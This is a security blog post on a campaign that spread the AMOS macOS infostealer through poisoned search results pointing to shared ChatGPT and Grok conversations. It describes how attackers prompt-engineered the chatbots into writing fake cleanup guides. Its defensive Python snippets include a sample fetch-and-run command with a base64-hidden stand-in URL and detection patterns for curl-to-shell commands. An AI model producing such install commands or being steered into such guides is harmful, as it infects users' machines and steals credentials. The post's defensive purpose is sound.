Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations that provided clearly laid out instructions to run a command in the macOS Terminal. Running that command infects the machine with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on several levels. Because there is no prompt or review, the user never gets a chance to see or assess what the downloaded script will do before it runs. And because the command runs directly in the Terminal, it can bypass normal file download protections and execute anything the attacker wants.
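To illustrate how a base64-encoded string can hide the real download location, here is a minimal Python sketch that decodes base64-looking tokens in a pasted command so you can read them without running anything. The function name `decode_candidates`, the 16-character threshold, and the sample command are our own assumptions for illustration; the actual command used in the campaign is not reproduced here.

```python
import base64
import binascii
import re

# Runs of base64 characters long enough to plausibly hide a URL.
# The minimum length of 16 is an arbitrary choice for this sketch.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_candidates(command: str) -> list[str]:
    """Return readable decodings of base64-looking tokens found in a command."""
    decoded = []
    for token in B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or it does not decode to text
        if text.isprintable():
            decoded.append(text)
    return decoded


# Hypothetical command shape; example.invalid is a reserved, non-resolving domain.
sample_payload = base64.b64encode(b"https://example.invalid/install.sh").decode()
sample_command = f'/bin/bash -c "$(curl -fsSL $(echo {sample_payload} | base64 -d))"'

# Nothing is downloaded or executed here; the string is only decoded and printed.
print(decode_candidates(sample_command))
```

Decoding a string this way only shows where a command would fetch its script from. It does not tell you whether that script is safe, so an unexpected URL is a reason to stop, not to investigate by running it.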



Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.

Then the criminals either pay for a sponsored search result pointing to the shared conversation or use SEO techniques to push their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results, so you’ll need to check who the advertiser is to find out whether the result is genuine.

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

- First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware that we recommend skipping them or making sure you never see them. At best they cost the company you were looking for money, and at worst you fall prey to impostors.

- If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.

- Use real-time anti-malware protection, preferably one that includes a web protection component.

- Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like `curl … | bash` or similar combinations.
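As a rough illustration of what “download and run” commands tend to look like, the Python sketch below flags a few common shapes in a pasted command. The pattern list and the name `risky_reasons` are assumptions made for this example and are far from exhaustive, so a command that passes this check is not proven safe.

```python
import re

# Illustrative patterns only; attackers can easily vary or obfuscate their commands.
RISKY_PATTERNS = {
    "download piped to a shell": re.compile(
        r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    ),
    "shell running a downloaded script": re.compile(
        r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b"
    ),
    "base64 decoding inside the command": re.compile(
        r"\bbase64\s+(-d|-D|--decode)\b"
    ),
}


def risky_reasons(command: str) -> list[str]:
    """Return the name of every risky pattern that matches the command."""
    return [
        reason
        for reason, pattern in RISKY_PATTERNS.items()
        if pattern.search(command)
    ]


# Hypothetical commands; example.invalid is a reserved, non-resolving domain.
for candidate in (
    "curl -fsSL https://example.invalid/cleanup.sh | bash",
    "df -h",
):
    print(candidate, "->", risky_reasons(candidate) or "no known pattern matched")
```

A check like this is best treated as a reminder to pause and read the command, not as a verdict on it.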

If you’ve scanned your Mac and found the AMOS information stealer:

- Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.

- If any signs of a persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.

- After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.

- Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.
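If you want to review launch items yourself, the following Python sketch lists the property list files in the standard macOS LaunchAgents and LaunchDaemons folders, newest first, with the label and program each one starts. It is a minimal example under our own assumptions: the function name `launch_items` is hypothetical, and the script only lists entries. It cannot tell you which ones are malicious and it removes nothing.

```python
import plistlib
from datetime import datetime
from pathlib import Path

# Standard macOS locations for per-user and system-wide launch items.
LAUNCH_DIRS = [
    Path.home() / "Library" / "LaunchAgents",
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
]


def launch_items(directories):
    """List launch item plists, newest first, with their label and program."""
    items = []
    for directory in directories:
        if not directory.is_dir():
            continue  # folder is missing, or this is not a Mac
        for path in directory.glob("*.plist"):
            try:
                with path.open("rb") as handle:
                    data = plistlib.load(handle)
            except Exception:
                data = None  # unreadable or malformed plist
            if isinstance(data, dict):
                label = data.get("Label", "(no label)")
                args = data.get("ProgramArguments") or [data.get("Program", "(unknown)")]
                program = " ".join(str(arg) for arg in args)
            else:
                label, program = "(unreadable)", "(unreadable)"
            items.append({
                "path": path,
                "label": label,
                "program": program,
                # lstat avoids errors on dangling symlinks
                "modified": datetime.fromtimestamp(path.lstat().st_mtime),
            })
    return sorted(items, key=lambda item: item["modified"], reverse=True)


for item in launch_items(LAUNCH_DIRS):
    print(f'{item["modified"]:%Y-%m-%d %H:%M}  {item["label"]}  ->  {item["program"]}  ({item["path"]})')
```

Recently modified entries that you don’t recognize, or that point to programs in unusual locations, are the ones worth a closer look.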

If all this sounds too difficult to do yourself, ask a person or company you trust to help you. Our support team is happy to assist you if you have any concerns.
